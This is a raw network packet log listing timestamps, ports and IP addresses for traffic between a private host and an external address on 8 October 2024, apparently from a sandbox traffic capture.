Oct 8, 2024 20:52:31.341147900 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.341334105 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.341424942 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.341439009 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.341451883 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.341464996 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.341795921 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.341835976 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.341850996 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.342036009 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.342047930 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.342061996 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.342081070 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.342082024 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.343023062 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.343023062 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.346518993 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.346543074 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.346555948 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.346570969 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.346802950 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.348655939 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.348670006 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.348684072 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.348814964 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.349452019 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.349503994 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.349515915 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.349530935 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.349682093 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.349971056 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.349982023 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.349996090 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.350009918 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.350279093 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.350292921 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.350306034 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.351008892 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.351008892 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.351008892 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.452125072 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.452224016 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.452239037 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.452254057 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.452266932 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.452281952 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.452295065 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.452343941 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.452377081 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.452390909 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.452447891 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.452461004 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.452476978 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.452491999 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.452905893 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.452923059 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.452944040 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.453003883 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.453017950 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.453038931 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.453054905 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.453068018 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.453104973 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.453119040 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.453133106 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.453866005 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.453902006 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.453915119 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.454045057 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.454057932 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.454071999 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.454083920 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.454099894 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.454113960 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.454128027 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.454144001 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.454799891 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.454822063 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.454837084 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.454984903 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.455008030 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.455020905 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.455045938 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.455060005 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.455073118 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.455100060 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.455112934 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.455840111 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.455893040 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.455907106 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.455935955 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.455950022 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.455965042 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.455979109 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.456062078 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.456075907 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.456089973 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.456104040 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.456276894 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.456722021 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.456759930 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.456774950 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.456847906 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.456860065 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.456873894 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.456887007 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.456908941 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.456923962 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.456938028 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.456952095 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.457727909 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.457850933 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.457865953 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.457879066 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.457890987 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.457906008 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.457920074 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.457933903 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.457947016 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.457959890 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.457974911 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.458703041 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.458861113 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.458873987 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.458888054 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.458899975 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.458914042 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.458928108 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.458940983 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.458954096 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.458966970 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.458980083 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.461214066 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.461245060 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.461258888 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.461360931 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.461374998 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.461388111 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.461400986 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.461415052 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.461427927 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.461442947 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.478171110 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.483082056 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.483107090 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.483120918 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.483176947 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.483191013 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.483205080 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.485820055 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.485820055 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.485820055 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.485913038 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.485913992 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.485913992 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.485913992 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.485932112 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.486113071 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.486674070 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.486674070 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.556416988 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.556493998 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.556529045 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.556544065 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.556559086 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.556616068 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.556715965 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.556730032 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.556744099 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.556763887 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.556778908 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.556792021 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.556807041 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.556818962 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.556832075 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.556845903 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.557313919 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.557430983 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.557446003 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.557459116 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.557477951 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.557492018 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.557503939 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.557518005 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.557532072 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.558106899 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.558145046 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.558157921 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.558187962 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.558208942 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.558222055 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.558237076 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.558279991 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.558295012 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.558314085 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.558329105 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.559040070 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.559052944 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.559067011 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.559133053 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.559146881 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.559160948 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.559180021 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.559196949 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.559211016 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.559223890 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.559240103 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.559818029 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.559818029 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.559818029 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.559880972 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.559920073 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.560233116 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.560255051 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.560267925 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.560313940 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.560332060 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.560381889 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.560395002 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.560440063 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.560452938 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.560466051 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.560480118 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.560934067 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.561031103 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.561044931 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.561058998 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.561072111 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.561084986 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.561113119 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.561126947 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.561140060 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.561152935 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.561166048 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.561944008 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.561958075 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.561971903 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.562019110 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.562031031 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.562045097 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.562057018 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.562071085 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.562083006 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.562097073 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.562109947 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.562836885 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.562886953 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.562901974 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.562925100 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.562938929 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.563004971 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.563019991 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.563033104 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.563046932 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.563060045 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.563074112 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.563595057 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.563630104 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.563677073 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.563801050 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.563874960 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.563874960 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.563910007 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.564218044 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.566018105 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.566131115 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.566144943 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.566159010 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.566171885 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.566190004 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.566203117 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.566216946 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.566230059 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.566243887 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.566297054 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.566309929 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.566323996 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.566337109 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.570971966 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.571330070 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.643762112 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.643789053 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.643804073 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.643819094 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.643876076 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.643892050 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.643907070 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.644064903 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.644079924 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.644097090 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.644109964 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.644124031 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.644140959 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.644154072 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.644166946 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.644181967 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.644196033 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.644197941 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.644210100 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.644224882 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.644227028 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.644371986 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.644381046 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.644547939 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.644562006 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.644596100 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.644743919 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.644757032 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.644921064 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.644934893 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.644948006 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.644962072 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.644974947 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.644989014 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.645086050 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.645098925 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.645112991 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.645126104 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.645139933 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.645251989 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.645421982 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.645437956 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.645454884 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.645601988 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.645617008 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.645631075 CEST	3752	49716	147.45.126.71	192.168.2.8
